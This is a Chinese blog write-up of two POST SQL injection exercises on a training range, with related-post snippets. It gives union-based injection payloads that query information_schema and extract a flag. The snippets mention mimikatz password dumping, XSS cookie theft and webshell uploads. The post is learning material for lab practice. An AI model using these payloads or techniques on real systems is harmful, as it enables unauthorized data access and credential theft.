post/get注入——靶场操作记录<掌控安全>

最新推荐文章于 2021-11-15 17:38:55 发布
最新推荐文章于 2021-11-15 17:38:55 发布
阅读量434 收藏 1
点赞数
分类专栏: 漏洞/靶场操作记录 文章标签: 数据库 sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/120530900
版权

post注入第一题

——————————分析靶场——————————
发现区别


怎么没有id=1?
没有那我自己输入试一下看行不行


得出答案……不行

post & get 区别一

get 会进行url编码

再次寻找用户可以自己输入数据的地方

尝试万能密码登录试一下

发现界面发生变化

————————————————尝试注入———————————————
再次输入其他信息试一下


发现输入内容被两个单引号所闭合
这会造成输入内容当成字符串,而不是代码进行执行
输入
‘ union select 1,2,3 — qwer
单引号破解被闭合 并且得到输出点


输出点为第二 第三字段位置
再次输入


得出数据库版本 以及当前数据库名


说明我输入的内容已经成功在数据库中执行,并且返回查询数据
——————————————进行下一步——————————————
数据库版本确定,大概率有系统自带库information_schema存在
输入


union select 1,2,table_name from information_schema.tables where table_schema=database() — qwer’
得出表名flag


然后再次进行查询字段名
‘ union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=’flag’ — qwer


得出字段id
然后进行limit 看看有没有其他的字段


得出flag字段

那么进行 flag查询


得到flag数据


再次利用limit 1,1看有没有其他flag

结论:牢记注入的本质是用户输入的内容被当作代码执行
多次尝试总比一次放弃好的多!

post注入第二题

————————————分析靶场————————————

发现url 依旧是没有id 没有?


但是还是要尝试


发现不得行
尝试在输入框输入数据


发现我自己输入的数据被括号以及双引号包裹
导致输入内容被当成字符串,

————————————尝试突破————————————


输入”)突破闭合成功
并且得出输出点。

再次输入


得出 数据库的版本 以及当前数据库

数据库版本大于5.0 大概率存在系统自带information_schema

尝试进行注入
“) union select 1,2,talbe_name from information_schema.tables where table_schema=database() — qwer”) and password=(“”)


发现不得行 原因是因为单词写错(再次证明细心是必要的 !)
“) union select 1,2,table_name from information_schema.tables where table_schema=database() — qwer
改正后输入
并且得出表名flag

尝试得出字段名


得出一个字段id
尝试使用limit 得出其他字段
“) union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=’flag’ limit 1,1 — qwer

得出flag 字段

继续查询flag信息

”)union select 1,2,flag from flag — qwer

得出flag并且使用limit

完成post注入

结论 :再次印证注入的本质(用户可以控制输入的字符被当作代码在数据库进行执行)
渗透测试在于多尝试 并且 细心 多尝试 多想!

chick&
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3670
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
ctf实战 掌控安全靶场 第七关通关记录
wh1te 小白的博客
09-27 949
 题目  远程连接设置可以上传本机文件 在本地设备与资源中选择详细信息 将要上传的工具的驱动器勾选上,可以选择u盘   把mimikatz上传至虚拟机  privilege::debug 提升权限   sekurlsa::logonpasswords 抓取密码   得到最后的flag   通关    ...
POST注入靶场练习
weixin_45540609的博客
04-15 344
题目1 使用手工注入 1、判断是否存在SQL注入 (1)admin'后直接使用-- qwe注释 (2)使用万能密码 admin ' or 1=1 -- qwe SQL注入成功 2、判断字段数 输入admin' order by 3 -- qwe和admin' order by 4 -- qwe,只有order by 3的时候可以输出,则字段数是3 3、查找回显点 admiiin' union select 1,2,3 -- qwe ps:由于网站输出会输出数据库最上...
密码找回漏洞—靶场操作掌控安全
chick11的博客
09-27 625
这题主要就是绕过验证码 来到靶场根据靶场提示访问:http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok 发现是一个重置密码的页面 我们把这题的源码下载下来进行审计 全局搜索里搜:密码找回 通过审计发现,$fsjs=rand(10,10000)随机生成认证码, 只有认证码一样就可以重置密码 我么通过抓包进行爆破 爆破成功 ...
ctf实战 掌控安全靶场 第一关通关记录
wh1te 小白的博客
09-17 5821
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
Nginx静态文件响应POST请求 提示405错误的解决方法
09-30
<head><title>405 Not Allowed</title></head> <body bgcolor="white"> <center><h1>405 Not Allowed</h1></center> <hr><center>nginx/1.2.0</center> </body> </html> ``` 然而,在某些特殊的应用场景下,...
C/C++利用Boost库发送POST/GET请求
03-24
http协议是互联网上应用最为广泛的一种网络协议,他在接口中扮演着重要的角色,Post/Get请求,想必大家都有所耳闻,我们一起利用Boost::Asio库来实现Post/Get请求的发送。 VS2013 文章地址:...
android http post/get
04-14
Map<String, DataPart> params = new HashMap<>(); params.put("file", new DataPart("filename", getFileStream())); return params; } }; queue.add(request); ``` **4. 文件下载** 文件下载可以通过...
ASP.NET过滤类SqlFilter,防止SQL注入 原创
10-22
本文分享一个防SQL注入的过滤类SqlFilter,可以防止通过POST、GET和Cookies的注入
html页面模式get/post请求
09-14
<form action="your-api-url" method="post"> <!-- 输入字段 --> <input type="text" name="key1" value="value1"> <input type="text" name="key2" value="value2"> <!-- 提交按钮 --> <button type="submit">...
ctf实战 掌控安全靶场 第五关通关记录
wh1te 小白的博客
09-27 1102
题目 cookie上一关获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12)  将名称改为上一关获得的cookie名,值改为上一关得到的cookie值 修改好了点击“准备好了即可” 查看可以上传文件类型 发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可 在产品管理中可以修改 文件图片 ...
掌控安全靶场第三章
小白渣的博客
12-09 1373
cookie 伪造目标权限 打开传送门,可以看到这样的页面 按照题目提示是一个存储型的xss,于是我们在能留言的地方都输入看看有没有弹窗, 成功弹窗了 因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,随便...
mysql注入靶场,SQL注入靶场Post注入 Rank1-3
weixin_36476970的博客
03-18 148
---------------------------------Rank 1 -------------------------------------------------先在表单Username编辑框中输入1,点登录,页面回显如下:image.png然后在Username中输入1',点登录,再看回显,看是否存在注入:image.png可看到存在注入,且从错误提示信息中可以看到,数据库是My...
sql显错注入——靶场操作记录掌控安全
chick11的博客
09-28 2511
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
sql注入之GET/POST注入
热门推荐
qq_38135094的博客
04-02 1万+
针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入 还需要判断数据库类型,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类型,则是MSSQL数据库
[zkaq靶场]SQL注入--POST注入
wwxxee
05-08 448
SQL注入POST注入 POST注入 POST注入与GET型注入没有本质区别 POST注入一 输入账号密码,然后抓包 检测出单引号闭合的方式,接下来就可以进行注入. 检测出字段数 username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95 检测回显点 ![] 爆库 username=admin1’ union select 1,2,database()–+&password=1&su
掌控安全靶场第二章:遇到阻难!绕过WAF过滤!
k1k5cn的博客
11-10 2507
最近在学习CTF,前不久发现一个还不错的靶场 封神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章:遇到阻难!绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1092
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
掌控安全做题
weixin_55773382的博客
11-15 3125
第一题,整数型 1,判断是否存在注入点 后边添加and 1=1 查看是否正常回显,如果正常就说明存在注入 2,猜解字段数 采用二分法 使用order by 语句 3,查询联合输出点 例子:id=1 and 1=2 union select 1,2 3 4,查询数据库名 and 1=2 union select 1,2 database()# 5,查询数据库表名 union select 1,2,group_concat(table_name) from information_schema.tables w
帮我找出这段代码的错误并给出正确答案<html> <head> <meta charset="utf-8" /> <link rel="stylesheet" type="text/css" href="css/style.css" /> <title>学生成绩管理系统</title> </head> <body> <h1>学生成绩管理系统</h1> <form action="./server/user_server.php" method="post"> <table> <tr> <td>用户名: </td> <td><input type="text" name="account"></td> </tr> <tr> <td>密码: </td> <td><input type="password" name="password"></td> </tr> <tr> <td><button type="submit">登录</button></td> <td> <span> <?php echo isset($_GET['message']) ? $_GET['message'] : ""; ?> </span> </td> </tr> </table> </form> </body> </html>
最新发布
06-07
这段代码的错误是在第 18 行,缺少了右括号")"。正确答案如下所示: ```html <html> <head> <meta charset="utf-8" /> <link rel="stylesheet" type="text/css" href="css/style.css" /> <title>学生成绩管理系统</title> </head> <body> <h1>学生成绩管理系统</h1> <form action="./server/user_server.php" method="post"> <table> <tr> <td>用户名: </td> <td><input type="text" name="account"></td> </tr> <tr> <td>密码: </td> <td><input type="password" name="password"></td> </tr> <tr> <td><button type="submit">登录</button></td> <td> <span> <?php echo isset($_GET['message']) ? $_GET['message'] : ""; ?> </span> </td> </tr> </table> </form> </body> </html> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值